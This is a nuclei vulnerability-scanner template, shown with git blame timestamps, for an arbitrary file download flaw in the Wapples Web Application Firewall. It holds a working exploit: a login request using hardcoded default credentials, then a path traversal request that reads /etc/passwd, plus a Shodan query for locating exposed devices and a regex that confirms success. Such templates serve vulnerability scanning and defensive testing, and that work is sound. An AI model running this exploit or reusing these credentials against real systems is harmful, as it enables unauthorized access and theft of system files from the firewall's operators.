nuclei-templates/vulnerabilities/other/wapples-firewall-lfi.yaml

40 lines
978 B
YAML
Raw Normal View History

2022-09-14 04:13:52 +00:00
id: wapples-firewall-lfi
info:
2022-09-14 10:42:34 +00:00
name: Wapples Web Application Firewall - Arbitrary File Download
2022-09-14 04:13:52 +00:00
author: For3stCo1d
severity: high
reference:
- https://medium.com/@_sadshade/wapples-web-application-firewall-multiple-vulnerabilities-35bdee52c8fb
metadata:
verified: true
shodan-query: http.title:"Intelligent WAPPLES"
2022-09-14 10:42:34 +00:00
tags: wapples,firewall,lfi,authenticated
2022-09-14 04:13:52 +00:00
requests:
- raw:
- |
POST /webapi/auth HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2022-09-14 10:42:34 +00:00
id={{username}}&password={{password}}
2022-09-14 04:13:52 +00:00
- |
GET /webapi/file/transfer?name=/../../../../../../../../etc/passwd&type=db_backup HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2022-09-14 10:42:34 +00:00
attack: pitchfork
payloads:
username:
- systemi
password:
- db/wp.no1
2022-09-14 04:13:52 +00:00
2022-09-14 10:42:34 +00:00
cookie-reuse: true
2022-09-14 04:13:52 +00:00
matchers:
- type: regex
regex:
- "root:[x*]:0:0"